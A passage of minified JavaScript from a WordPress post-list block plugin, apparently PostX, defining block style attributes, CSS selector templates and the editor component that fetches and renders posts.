}"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-entry-heading .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-entry-heading .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"30",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"gridStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title,\n                    {{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a"},{depends:[{key:"titleShow",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item:first-child .ultp-block-title,\n                    {{ULTP}} .ultp-block-items-wrap .ultp-block-item:first-child .ultp-block-title a"}]},postListTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item:not(:first-child) .ultp-block-title,\n                    {{ULTP}} .ultp-block-items-wrap .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-entry-heading .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"==",value:"style2"}]},{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"==",value:"style3"}]}]},imgWidth:{type:"object",default:{lg:"",ulg:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { max-width: {{imgWidth}}; display: block; }\n\t\t\t\t\t{{ULTP}} .ultp-block-item .ultp-block-image img { width: 100% }\n                    {{ULTP}} .ultp-block-item .ultp-block-video-content video,\n                    {{ULTP}} .ultp-block-item .ultp-block-video-content iframe { max-width: {{imgWidth}}; width: 100% !important; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-image img,\n                    {{ULTP}} .ultp-block-item .ultp-block-video-content video,\n                    {{ULTP}} .ultp-block-item .ultp-block-video-content iframe { height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"none"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"20"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { margin-bottom: {{imgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},fullExcerptLg:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptLimitLg:{type:"string",default:70,style:[{depends:[{key:"fullExcerptLg",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,   \n                {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n                    {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:5,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-entry-content,\n                    {{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }\n                    {{ULTP}} .ultp-block-meta { justify-content: flex-start; }\n                    {{ULTP}} .ultp-block-image img { margin-right: auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-entry-content,\n                    {{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }\n                    {{ULTP}} .ultp-block-meta {justify-content: center;}\n                    {{ULTP}} .ultp-block-image img { margin: 0 auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-entry-content,\n                    {{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }\n                    {{ULTP}} .ultp-block-meta {justify-content: flex-end;} .rtl \n                    {{ULTP}} .ultp-block-meta {justify-content: start;}  \n                    {{ULTP}} .ultp-block-image img { margin-left: auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl\n                    {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content\n                    {{ULTP}} .ultp-block-entry-heading { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},headerWidth:{type:"object",default:{lg:"70",unit:"%"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { max-width: {{headerWidth}}; }"}]},headerWrapBg:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { background:{{headerWrapBg}}; }"}]},headerWrapHoverBg:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading:hover { background:{{headerWrapHoverBg}}; }"}]},headerWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading"}]},headerWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading:hover"}]},headerWrapRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { border-radius: {{headerWrapRadius}}; }"}]},headerWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading:hover { border-radius: {{headerWrapHoverRadius}}; }"}]},headerSpaceX:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-block-entry-heading { left: {{headerSpaceX}}; }"},{depends:[{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-block-entry-heading { left: {{headerSpaceX}};transform: translateX(0%);right:auto }"},{depends:[{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-block-entry-heading { right: {{headerSpaceX}};left:auto; }"}]},headerSpaceY:{type:"object",default:{lg:"30"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { top: -{{headerSpaceY}}px; }\n                    {{ULTP}} .ultp-block-item { margin-top: {{headerSpaceY}}px; }"}]},headerWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { padding: {{headerWrapPadding}}; }"}]},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"#e5e5e5",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-width: {{septSize}}px; }"}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n                    {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover,\n                    {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n                    {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}} }"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n                    {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n                    {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n                    {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],[],[{key:"queryNumber",default:6},{key:"vidIconPosition",default:"center"},{key:"iconSize",default:{lg:"80",sm:"50",xs:"50",unit:"px"}},{key:"pagiAlign",default:{lg:"left"}},{key:"metaSeparator",default:" "},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaMargin",default:{lg:{top:"",bottom:"20",left:"",right:"",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Primary_color)"}},{key:"catSacing",default:{lg:{bottom:5,unit:"px"},unit:"px"}},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"readMore",default:!0},{key:"readMoreColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreSacing",default:{lg:{top:25,bottom:"",left:"",right:"",unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},48844:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(64173),r=l(36682),s=l(20629);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-List-1/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-list-1.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postlist1.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-list-1","listBlocks")]},edit:n.Z,save:()=>null})},42510:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(17285);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useRef:E,useState:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=E(null),{setAttributes:l,name:M,clientId:A,attributes:H,context:N,isSelected:j,className:Z,attributes:{blockId:O,currentPostId:R,readMoreIcon:D,imgCrop:z,imgCropSmall:F,excerptLimit:W,showFullExcerpt:V,showSmallMeta:G,metaStyle:q,metaShow:$,catShow:K,showImage:J,metaSeparator:Y,titleShow:X,catStyle:Q,catPosition:ee,titlePosition:te,excerptShow:le,imgAnimation:oe,imgOverlayType:ae,imgOverlay:ie,metaList:ne,metaListSmall:re,showSmallCat:se,readMore:pe,readMoreText:ce,showSmallBtn:ue,showSmallExcerpt:de,varticalAlign:me,imgFlip:ge,metaPosition:ye,layout:be,customCatColor:ve,onlyCatColor:he,contentTag:fe,titleTag:ke,showSeoMeta:we,titleLength:xe,metaMinText:Te,metaAuthorPrefix:_e,titleStyle:Ce,metaDateFormat:Ee,authorLink:Se,fallbackEnable:Pe,vidIconEnable:Le,notFoundMessage:Ie,excerptLimitLg:Be,fullExcerptLg:Ue,dcEnabled:Me,dcFields:Ae,previewImg:He,advanceId:Ne,paginationShow:je,paginationAjax:Ze,headingShow:Oe,filterShow:Re,paginationType:De,navPosition:ze,paginationNav:Fe,loadMoreText:We,paginationText:Ve,V4_1_0_CompCheck:{runComp:Ge}}}=e,[qe,$e]=S(w.Ti),[Ke,Je]=S(null);function Ye(e){$e({...qe,selectedDC:e})}function Xe(){$e({...qe,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Qe(e){$e({...qe,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),Je("setting")}function et(e){$e((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function tt(){qe.error&&$e({...qe,error:!1}),qe.loading||$e({...qe,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(H)}).then((e=>{$e({...qe,postsList:e,loading:!1})})).catch((e=>{$e({...qe,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),tt()}),[]),C((()=>{const t=A.substr(0,6),o=B(U(A));(0,a.qi)(l,o,R,A),(0,v.h)(e),O?O&&O!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[A]),C((()=>{const e=t.current;(0,h.o6)()&&0===H.dcFields.length&&l({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,H)&&(tt(),t.current=H),e.isSelected!==j&&j&&(0,w.gT)(Qe,et)):t.current=H}),[H]);const lt={settingTab:Ke,setSettingTab:Je,setAttributes:l,name:M,attributes:H,setSection:Qe,section:qe.section,clientId:A,context:N,setSelectedDc:Ye,selectedDC:qe.selectedDC,selectParentMetaGroup:function(e){Ye(e),et("dc_group")}};let ot;if(O&&(ot=(0,y.Kh)(H,"ultimate-post/post-list-2",O,(0,a.k0)())),He&&!j)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:He});C((()=>{j&&He&&l({previewImg:""})}),[e?.isSelected]);const at=_({...Ne&&{id:Ne},className:`ultp-block-${O} ${Z}`,onClick:e=>{e.stopPropagation(),Qe("general"),et("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:lt,selected:qe.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:lt})),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"layout",block:"post-list-2",key:"layout",options:[{img:"assets/img/layouts/pl2/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl2/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl2/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl2/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}]},{type:"feat_toggle",label:__("Post List Features","ultimate-post"),new:a.KE,[Ge?"exclude":"dep"]:a.N2}],store:lt}),(0,o.createElement)("div",at,ot&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ot}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Oe||Re||je)&&(0,o.createElement)(r.m,{attributes:H,setAttributes:l,onClick:()=>{Qe("heading"),et("heading")},setSection:Qe,setToolbarSettings:et}),function(){const e=`${fe}`,t=(e,t)=>(0,h.o6)()&&Me&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Ae,settingsOnClick:(e,t)=>{e?.stopPropagation(),et(t)},selectedDC:qe.selectedDC,setSelectedDc:Ye,setAttributes:l,dcFields:Ae});return qe.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):qe.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):qe.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-content-${me} ultp-block-content-${ge} ultp-${be}`},qe.postsList.map(((a,r)=>{const p=0==r?JSON.parse(ne.replaceAll("u0022",'"')):JSON.parse(re.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:r,className:`ultp-block-item ultp-block-media post-id-${a.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap "+(0===r?"ultp-first-postlist-2":"ultp-all-postlist-2")},0===r&&t(8,a.ID),(a.image&&!a.is_fallback||Pe)&&J&&(0==r||0!=r&&"layout1"===be||"layout4"===be)&&(0,o.createElement)(s.A8,{imgOverlay:ie,imgOverlayType:ae,imgAnimation:oe,post:a,fallbackEnable:Pe,vidIconEnable:Le,imgCropSmall:F,showImage:J,imgCrop:z,idx:r,Category:0!=r&&!se||"aboveTitle"==ee?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:a,catShow:K,catStyle:Q,catPosition:ee,customCatColor:ve,onlyCatColor:he,onClick:e=>{Qe("taxonomy-/-category"),et("cat")}})),Video:Le&&a.has_video?(0,o.createElement)(s.nk,{onClick:()=>{Qe("video"),et("video")}}):null,onClick:()=>{Qe("image"),et("image")}}),(0,o.createElement)("div",{className:"ultp-block-content"},0!==r&&t(8,a.ID),t(7,a.ID),"aboveTitle"==ee&&(0==r||se)&&(0,o.createElement)(i.Z,{post:a,catShow:K,catStyle:Q,catPosition:ee,customCatColor:ve,onlyCatColor:he,onClick:e=>{Qe("taxonomy-/-category"),et("cat")}}),t(6,a.ID),a.title&&X&&1==te&&(0,o.createElement)(g.Z,{title:a.title,headingTag:ke,titleLength:xe,titleStyle:Ce,onClick:e=>{Qe("title"),et("title")}}),t(5,a.ID),(0==r||G)&&$&&"top"==ye&&(0,o.createElement)(c.Z,{meta:p,post:a,metaSeparator:Y,metaStyle:q,metaM